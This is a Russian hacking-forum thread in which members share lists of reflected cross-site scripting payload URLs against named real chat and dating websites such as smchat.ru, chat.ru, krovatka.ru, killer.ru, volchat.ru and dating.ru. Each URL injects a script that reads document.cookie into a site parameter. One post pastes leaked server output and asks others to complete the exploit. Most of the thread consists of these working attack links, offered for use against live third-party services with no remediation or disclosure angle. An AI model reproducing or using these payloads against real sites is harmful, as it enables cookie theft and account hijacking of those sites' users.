Форум АНТИЧАТ - XSS на известных чатах

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)

- - XSS на известных чатах (https://forum.antichat.xyz/showthread.php?t=25967)

Xss на известных чатах

После небольшого затишья своей активности, выкладываю кое что на закуску.

SMCHAT.RU
=======================
http://www.smchat.ru/?key="><script>alert(document.cookie)</script>
http://www.smchat.ru/?chatname=&key="><script>alert(document.cookie)</script>
http://www.smchat.ru/?ontopic=default&login="><script>alert(document.co okie)</script>
http://www.smchat.ru/?activate=&login="><script>alert(document.cookie)</script>
http://www.smchat.ru/?password1=&login="><script>alert(document.cookie) </script>
http://www.smchat.ru/?det=default&login="><script>alert(document.cookie )</script>
http://www.smchat.ru/?count=1000&key="><script>alert(document.cookie)</script>
http://www.smchat.ru/?email=&key="><script>alert(document.cookie)</script>
=======================
Впрочем есть ещё пассивки, но думаю для начала этого хватит.

CHAT.RU
=======================
http://www.chat.ru/user/register.html?dop10=default&confemail="><script>al ert(document.cookie)</script>
http://www.chat.ru/user/register.html?anotherpw="><script>alert(document.c ookie)</script>
http://www.chat.ru/user/register.html?city=&name="><script>alert(document. cookie)</script>
http://www.chat.ru/user/register.html?action=default&username="><script>al ert(document.cookie)</script>
http://www.chat.ru/user/register.html?city=&year="><script>alert(document. cookie)</script>
=======================
Опять же не весь список. Комбинируя запросы можно хоть сотни таких xss реализовать.

Что касается SMCHAT...
ты првел много ссылок, но в итоге надо оставить тока:

http://www.smchat.ru/?key="><script>alert(document.cookie)</script>
http://www.smchat.ru/?login="><script>alert(document.cookie)</script>

т.к. именно в этих параметрах ты приводил, выход XSS, а остальные ссылки, это льши комбинации...

KROVATKA.RU
Вот и добрались:)
=======================
При нажатии Отмена, xss срабатывает:

Код:

http://klubnichka.krovatka.ru/k?f=45&newwin=1&id2=5816&id=5673xee7kY1Y&c=8"><script>alert(document.cookie)</script>

-----------------------------------------

http://klubnichka.krovatka.ru/f/e.cgi?c=6&n="><script>alert(document.cookie)%3B</script>

http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn="><script>alert(document.cookie)%3B</script>

http://klubnichka.krovatka.ru/sms/xp.cgi?mn="><script>alert(document.cookie)%3B</script>&ch=6&flag=0

http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn=%3Cmeta+http-equiv=%3E%3C/title%3E%20%3Cscript%3Ealert(document.cookie)%3C/script%3E

=======================
XSS Нашли [sL1p] & blackybr

Killer.ru
_http://chat.killer.ru/cgi-bin/chat.cgi?session=&room=21&form="><script>alert()</script>
При входе по данной ссылке вылезает алерт и

Код:

Cache-Control: no-store Pragma: no-cache Content-Type: text/html; charset="us-ascii" 

Can't open form template.



formpath: 

servername: chat.killer.ru 

file: /home/serg/chat-2.01/chat-html/">.html

И тут вот сайтик к ним относится тоже:
_http://chat.qwe.ru/index/search.php?q="><script>alert(document.cookie)</script>
Всё отлично вылетает...

CHATCITY.RU
Ухх как xss пошли то=) Уязвимость существует в скрипте отправки сообщений на какой либо ник. Например:

Код:

http://www.Chat ID.chatcity.ru/people/pp33.cgi?c=Chat ID&nn=[sL1p]

Вместо ника, подставляем наш код. В итоге:

Код:

http://www.Chat ID.chatcity.ru/people/pp33.cgi?c=Chat ID&nn="><script>alert(document.cookie)</script>

Chat ID заменяем на адрес чата. У всех они в цифровом значении.

Killer.ru

Код:

_http://chat.killer.ru/cgi-bin/chat.cgi?room=21&form=p_main&other_name="><script>alert(document.cookie)</script>

Выплёвывает такую фигню:

Код:

&last_msg_p="+last_msg; tmp_count++; count_reload++;  s=s+"&tmp_count="+tmp_count; hidden.location.href=s;  chatstatus((count_reload>2)?1:0); setTimeout("main_reload()", refresh_time);  } // === newmsg function add_txt_home(t) { if (msg && msg.new_msg  && msg.new_msg.old_message && t) { msg.new_msg.old_message.value  = t + msg.new_msg.old_message.value; msg.re_set(); } } function add_txt_end(t) {  if (msg && msg.new_msg && msg.new_msg.old_message && t)  { msg.new_msg.old_message.value = msg.new_msg.old_message.value + t;  msg.re_set(); } } // === execute check_refresh_time(); clr_mmas();  setTimeout("main_reload()", 7000); var smile_on=; // === оформление function  smile_txt(to_me,s) { if (!s) return ""; if (to_me && smile_sound=="")  smile_sound=s; if (smile_on) return "http://killer.ru/extras/smile/%22+s+%22.gif"; return "*"+s; }  function mail_txt(s) { if (!s) return ""; return ""+s+""; } function  url_txt(mode,s) { if (!s) return ""; return ""+s+""; } function getval(v) { if (v<10) return  "0"+v; return v; } function getdate(t) { if (!t || t<=0) return ""; var d =  new Date(1970,1,1); d.setTime(t*1000); var hh=d.getHours(); var  nn=d.getMinutes(); var ss=d.getSeconds();  return(getval(hh)+":"+getval(nn)+":"+getval(ss)); } function  addmsg(for_me,n,t,nick_color,nick,msg_color,n_msg) { nick_color='6699FF'; var  s=""; var tt=getdate(t); var St="["+tt+"] ";  if (for_me) set_sound=1; s=St+""+nick+": "+n_msg+"

alert(document.cookie)alert(document.cookie)alert(document.cookie)\n"; add_msg(n,s); } var user_status=3;  function put_user_status(t) { var s; if (t==1) s="офлайн"; else if (t==2) s="онлайн"; else if (t==0) s="ушел"; else return; user_status = t; if (msg  && msg.ou_status) msg.ou_status.innerHTML = s; } var smiles_flag=0;  function show_smiles() { translit_flag=0; if (smiles_flag==1) {  leftframe.rows="0,67,*,0,0,49,0"; smiles_flag=0; } else {  leftframe.rows="0,67,*,30,0,49,0"; smiles_flag=1; } msg.re_set(); } var  translit_flag=0; function translit_show() { smiles_flag=0; if (translit_flag==1)  { leftframe.rows="0,67,*,0,0,49,0"; translit_flag=0; } else {  leftframe.rows="0,67,*,0,49,49,0"; translit_flag=1; } msg.re_set(); }    " scrolling=no marginheight=0 noresize frameborder=0 border=0>   " scrolling=no marginheight=0 noresize frameborder=0 border=0>   " scrolling=no marginheight=0 noresize frameborder=0 border=0>

Может кто добъёт?! )))))

volchat.ru (Первый по поиску чатов)

Код:

_http://volchat.ru/people/pp1.cgi?c=13397&mn="><script>alert(document.cookie)</script>

_http://volchat.ru/kpobatka?f="><script>alert(document.cookie)</script>

(+)_http://www.postcard.ru/?to="><script>alert(document.cookie)</script>

dating.ru

Код:

http://dating.ru/reg_code.php?details=yes&rndnum="><script>alert(document.cookie)</script>

http://dating.ru/reg.php?rndnum="><script>alert(document.cookie)</script>